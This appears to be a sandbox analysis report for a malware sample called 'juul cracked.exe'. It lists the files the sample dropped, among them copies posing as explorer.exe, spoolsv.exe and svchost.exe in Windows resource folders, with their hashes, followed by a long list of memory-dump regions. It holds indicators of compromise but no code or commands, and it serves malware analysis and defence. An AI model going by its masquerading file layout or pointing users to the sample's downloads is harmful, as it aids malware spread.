98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Desktop\juul cracked.exe

Filesize
3.1MB

MD5
adac9c5bdf87462cd25dd58ab98f8bcb

SHA1
788f8c23d30ed5e1eadbac541a6068f8c92eb2f9

SHA256
cb75804e7a0442593874a1d35119f361a94ac68fb2317ebadd38a047542b996b

SHA512
e90e7a99c9fb0036655dc10ac1cd75f60f880f03e4014167fa9d70af5a6ef0af4d651cc9ca2f030114ce1125ee1a7f346eb85d0af0d8b732135f29ff10e534ed

Download Submit
C:\Users\Admin\Downloads\JUUL Cracked.zip:Zone.Identifier

Filesize
52B

MD5
dfcb8dc1e74a5f6f8845bcdf1e3dee6c

SHA1
ba515dc430c8634db4900a72e99d76135145d154

SHA256
161510bd3ea26ff17303de536054637ef1de87a9bd6966134e85d47fc4448b67

SHA512
c0eff5861c2df0828f1c1526536ec6a5a2e625a60ab75e7051a54e6575460c3af93d1452e75ca9a2110f38a84696c7e0e1e44fb13daa630ffcdda83db08ff78d

Download Submit
C:\Windows\Resources\Themes\explorer.exe

Filesize
135KB

MD5
2dad150c02b843b282a1a50c3101d000

SHA1
a8e2ef2e09823d57efc12c5311d03edd0f1afdf3

SHA256
dd562e7b31d68bf8d3c40ba81cf27d6080116e9ee4bd036dec6db0b7bc00ad6c

SHA512
5659165e76f4069bced9e67cb7c58671566d399d9cb3b4ce14fa73da001fa675759c740880ac518801a1470a82658e20615a97f7935fe877d6b67ea346b8b2c3

Download Submit
C:\Windows\Resources\Themes\icsys.icn.exe

Filesize
135KB

MD5
986461ad6a3170c94bd9f41dd1a4200d

SHA1
d151b3a56a49c6e28bc13670e63be1e8a81670bf

SHA256
7a4db38514ff5dcb2aed5425a9b6efd6b1c8a1e323be19fb9577d199281f1a56

SHA512
e37f2f60b16d88a013da83f09dcaeed97d5f77407c139202a0893ef1f6308d431beec61f39ff52ea53d7ae0a824ba68e195765cfefe354fa43348d77b225bdb5

Download Submit
\??\c:\windows\resources\spoolsv.exe

Filesize
135KB

MD5
4baa3bfac766f6987a2c29dcb9f7113a

SHA1
f3adf98bd7e8d891e0e6c0ecdda66d85363a9a2f

SHA256
02b2e553bb9deaef66fcc74eddc2e45b595bbde913e605ce9a46c64a6b35ead3

SHA512
068ad9c8d3b3c93478b483fb186df3cfce3c250054c1a10a9b7cab82575bc3936070104f6984cc60f91b541e5f18fc75885de1f02bfddcc98e2d550be5cfa227

Download Submit
\??\c:\windows\resources\svchost.exe

Filesize
135KB

MD5
dba56081b47d97ba9acb5671d1b682fc

SHA1
f3f4876e23ddd7f2057b1db2d46cad237a2f9e6d

SHA256
31a039e8b3a5a4637e0224e50bfbeab2179b0143e2db021099a7f1103571bade

SHA512
f36b7ae50272e0742708f61b9d7c2396b45b38494085f0089f7d3de719ff205b65f7be53e545fbf600d319997e01742f34c62783a2902b2c17cbb53b7a443209

Download Submit
memory/428-1060-0x00000223E1880000-0x00000223E1922000-memory.dmp

Filesize
648KB

Download
memory/428-977-0x00007FF9C4770000-0x00007FF9C5232000-memory.dmp

Filesize
10.8MB

Download
memory/428-1057-0x00000223C7160000-0x00000223C716C000-memory.dmp

Filesize
48KB

Download
memory/428-1055-0x00000223C7130000-0x00000223C7160000-memory.dmp

Filesize
192KB

Download
memory/428-1058-0x00000223E12A0000-0x00000223E12BA000-memory.dmp

Filesize
104KB

Download
memory/428-1059-0x00000223C8A70000-0x00000223C8AA2000-memory.dmp

Filesize
200KB

Download
memory/428-1111-0x00000223C7090000-0x00000223C70A0000-memory.dmp

Filesize
64KB

Download
memory/428-1061-0x00000223E12D0000-0x00000223E12D8000-memory.dmp

Filesize
32KB

Download
memory/428-1066-0x00000223E1B50000-0x00000223E1B6E000-memory.dmp

Filesize
120KB

Download
memory/428-1002-0x00000223C7090000-0x00000223C70A0000-memory.dmp

Filesize
64KB

Download
memory/428-1053-0x00000223C8A40000-0x00000223C8A62000-memory.dmp

Filesize
136KB

Download
memory/428-1003-0x00000223E1170000-0x00000223E11E6000-memory.dmp

Filesize
472KB

Download
memory/428-993-0x00000223E12F0000-0x00000223E1632000-memory.dmp

Filesize
3.3MB

Download
memory/428-998-0x00000223C6FB0000-0x00000223C6FB6000-memory.dmp

Filesize
24KB

Download
memory/428-1080-0x00007FF9C4770000-0x00007FF9C5232000-memory.dmp

Filesize
10.8MB

Download
memory/428-966-0x00000223C68D0000-0x00000223C6BAA000-memory.dmp

Filesize
2.9MB

Download
memory/428-1004-0x00000223E11F0000-0x00000223E12A0000-memory.dmp

Filesize
704KB

Download
memory/428-1220-0x00007FF9C4770000-0x00007FF9C5232000-memory.dmp

Filesize
10.8MB

Download
memory/1540-924-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1540-999-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2184-1334-0x00000237BE150000-0x00000237BE16A000-memory.dmp

Filesize
104KB

Download
memory/2216-1329-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2432-963-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2620-985-0x0000000006B60000-0x0000000006BF2000-memory.dmp

Filesize
584KB

Download
memory/2620-934-0x00000000744F0000-0x0000000074CA1000-memory.dmp

Filesize
7.7MB

Download
memory/2620-1056-0x00000000744F0000-0x0000000074CA1000-memory.dmp

Filesize
7.7MB

Download
memory/2620-938-0x0000000005940000-0x00000000059A6000-memory.dmp

Filesize
408KB

Download
memory/2620-933-0x00000000007F0000-0x0000000000B06000-memory.dmp

Filesize
3.1MB

Download
memory/2620-937-0x0000000005D00000-0x00000000062A6000-memory.dmp

Filesize
5.6MB

Download
memory/2620-936-0x0000000005740000-0x0000000005750000-memory.dmp

Filesize
64KB

Download
memory/2620-935-0x0000000000801000-0x0000000000802000-memory.dmp

Filesize
4KB

Download
memory/3284-980-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/3284-1000-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/3344-1362-0x00000142EFA10000-0x00000142EFA2A000-memory.dmp

Filesize
104KB

Download
memory/3536-1322-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/3540-1001-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/4820-1358-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/5016-997-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/5212-1336-0x0000000005420000-0x0000000005430000-memory.dmp

Filesize
64KB

Download
memory/5212-1335-0x00000000744F0000-0x0000000074CA1000-memory.dmp

Filesize
7.7MB

Download
memory/5212-1437-0x0000000005420000-0x0000000005430000-memory.dmp

Filesize
64KB

Download
memory/5212-1333-0x0000000000F40000-0x0000000001256000-memory.dmp

Filesize
3.1MB

Download
memory/5212-1423-0x00000000744F0000-0x0000000074CA1000-memory.dmp

Filesize
7.7MB

Download
memory/5372-1081-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/5372-1103-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/5420-1282-0x00000000744F0000-0x0000000074CA1000-memory.dmp

Filesize
7.7MB

Download
memory/5420-1088-0x0000000000360000-0x0000000000676000-memory.dmp

Filesize
3.1MB

Download
memory/5420-1089-0x00000000744F0000-0x0000000074CA1000-memory.dmp

Filesize
7.7MB

Download
memory/5420-1277-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/5420-1239-0x00000000744F0000-0x0000000074CA1000-memory.dmp

Filesize
7.7MB

Download
memory/5420-1090-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/5468-1289-0x00000254AEA00000-0x00000254AEA1A000-memory.dmp

Filesize
104KB

Download
memory/5500-1105-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/5528-1360-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/5540-1104-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/5568-1243-0x000001CA21E40000-0x000001CA21E50000-memory.dmp

Filesize
64KB

Download
memory/5568-1271-0x000001CA22400000-0x000001CA22432000-memory.dmp

Filesize
200KB

Download
memory/5568-1398-0x000001CA09560000-0x000001CA09595000-memory.dmp

Filesize
212KB

Download
memory/5568-1399-0x00007FF9C4770000-0x00007FF9C5232000-memory.dmp

Filesize
10.8MB

Download
memory/5568-1237-0x00007FF9C4770000-0x00007FF9C5232000-memory.dmp

Filesize
10.8MB

Download
memory/5568-1355-0x00007FF9C4770000-0x00007FF9C5232000-memory.dmp

Filesize
10.8MB

Download
memory/5640-1359-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/5640-1357-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/6052-1154-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/6052-1164-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/6068-1162-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/6104-1299-0x000001AE61420000-0x000001AE6143A000-memory.dmp

Filesize
104KB

Download